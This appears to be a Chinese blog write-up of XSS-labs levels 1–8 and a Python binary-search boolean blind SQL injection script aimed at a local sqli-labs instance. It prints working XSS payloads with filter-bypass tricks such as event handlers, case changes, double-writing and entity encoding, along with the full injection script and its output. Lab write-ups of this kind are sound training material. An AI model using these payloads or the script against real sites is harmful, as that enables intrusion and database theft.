Xss-labs攻关1-8

一、基础知识

Xss原本是Css,但是避免与前端进行冲突,所以称为Xss,一般有三种类型。

1.反射型Xss(前端直接返回)

2.存储型Xss(会存在数据库中)

3.DOM型Xss(前端进行返回,不经过服务器)

二、需求

1.攻关Xss-labs中的1-8关

2.用python代码使用二分法实现自动化的sql布尔盲注

三、具体操作过程

1.确保访问到靶场,打开nginx和MySQL,进行访问靶场。

2.漏洞:Xss漏洞通常在输入信息而导致的,所以在查看name进行输出地位置,修改传入地参数进行破解,输入以下代码进行破解。

复制代码
name=<script>alert(123)</script>

输入刷星得到完成地不错,即可过关。

  1. 在通过靶场的第一关之后,在进行第二关的时候,查看是input的闭合有问题,直接进行input进行闭合。

    '"><script>alert(123)</script>

4.来到第三关的时候, 直接输入xss的通常语句,

复制代码
<script>alert(12)</script>

以上可以看出,可能是闭合引起的,进行闭合的调整。

复制代码
" > <script>alert(12)</script>

可以看出没有找到,使用事件进行突破。

  1. 突破第四关时,先尝试在闭合时候是双引号还是单引号,输入以下进行验证。

    'aaa

由此查看,导引号的闭合是错误的额,使用双引号进行闭合。

复制代码
" aaa

可以知道是双引号及逆行闭合。

估计是做了特殊处理,进行事件来破解。

复制代码
" onclick="alert(1)  

6.攻破第五关的时候,使用之前的代码进行查看,发现找不到, 查看源代码,发现onclick和script都被进行替换,使用链接来进行突破。

复制代码
"><a href="javascript:alert(1)">点击</a>

7. 在进行第六关时,试一试上一关的代码是否可用,发现不可以进行,查看源代码时,发现href进行了替换,使用大小写进行绕过。

复制代码
"><a HREF="javascript:alert(1)">点击</a>

8.在到第七关时候,发现onfocus事件被过滤,使用双写来进行绕过。

复制代码
"oonnfocus="alert(1)"  

9.在进行第八关的时候,发现是一个链接,href会自动解码到Unicode,使用javascript:alert(123)进行测试,不可以,对该进行编码,直接过关。

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

二分查的代码如下:

复制代码
import requests
# 目标URL
url = "http://localhost/sqli-labs/Less-8/"
# 要推断的数据库信息(例如:数据库名)
database_name = ""
# 字符集(可以根据需要扩展)
charset = "abcdefghijklmnopqrstuvwxyz0123456789"
def get_database_length():    # 推断数据库名的长度
    length = 0
    while True:
        length += 1
        payload = f"1' AND (SELECT length(database()) = {length}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in..........." in response.text:
            return length
        if length > 50:  # 防止无限循环
            break
    return 0
# 使用二分查找推断数据库名
def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        left, right = 0, len(charset) - 1
        while left <= right:
            mid = (left + right) // 2
            char = charset[mid]
            payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "
            response = requests.get(url, params={"id": payload})
            if "You are in" in response.text:
                left = mid + 1
            else:
                right = mid - 1
        db_name += charset[right]
    return db_name
# 主函数
if __name__ == "__main__":
    length = get_database_length()
    if length > 0:
        print(f"数据库名长度: {length}")
        db_name = get_database_name(length)
        print(f"数据库名: {db_name}")
    else:
        print("无法确定数据库长度。")

结果如下;

复制代码
数据库名长度: 8
数据库名: security
相关推荐
一周七喜h16 分钟前
在Vue3和TypeScripts中使用pinia
前端·javascript·vue.js
weixin_3954489122 分钟前
main.c_cursor_0202
前端·网络·算法
东东5161 小时前
基于vue的电商购物网站vue +ssm
java·前端·javascript·vue.js·毕业设计·毕设
MediaTea1 小时前
<span class=“js_title_inner“>Python:实例对象</span>
开发语言·前端·javascript·python·ecmascript
梦梦代码精2 小时前
开源、免费、可商用:BuildingAI一站式体验报告
开发语言·前端·数据结构·人工智能·后端·开源·知识图谱
0思必得02 小时前
[Web自动化] Selenium执行JavaScript语句
前端·javascript·爬虫·python·selenium·自动化
程序员敲代码吗2 小时前
MDN全面接入Deno兼容性数据:现代Web开发的“一张图”方案
前端
0思必得02 小时前
[Web自动化] Selenium截图
前端·爬虫·python·selenium·自动化
疯子****3 小时前
【无标题】
前端·clawdbot
RichardLau_Cx3 小时前
【保姆级实操】MediaPipe SDK/API 前端项目接入指南(Web版,可直接复制代码)
前端·vue·react·webassembly·mediapipe·手部追踪·前端计算机视觉